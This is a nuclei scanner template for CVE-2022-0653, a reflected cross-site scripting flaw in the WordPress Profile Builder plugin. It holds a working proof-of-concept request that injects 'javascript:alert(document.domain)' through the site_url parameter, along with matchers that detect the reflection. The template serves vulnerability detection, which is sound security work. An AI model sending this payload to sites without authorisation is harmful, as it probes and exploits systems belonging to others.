nuclei-templates/cves/2022/CVE-2022-0653.yaml

43 lines
1.7 KiB
YAML

id: CVE-2022-0653
info:
name: Wordpress Profile Builder Plugin Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: |
The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
- https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2655168%40profile-builder&new=2655168%40profile-builder&sfp_email=&sfph_mail=
remediation: Upgrade to version 3.6.5 or later.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0653
cwe-id: CWE-79
tags: cve,cve2022,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/profile-builder/assets/misc/fallback-page.php?site_url=javascript:alert(document.domain);&message=Not+Found&site_name=404"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<a href="javascript:alert(document.domain);">here</a>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28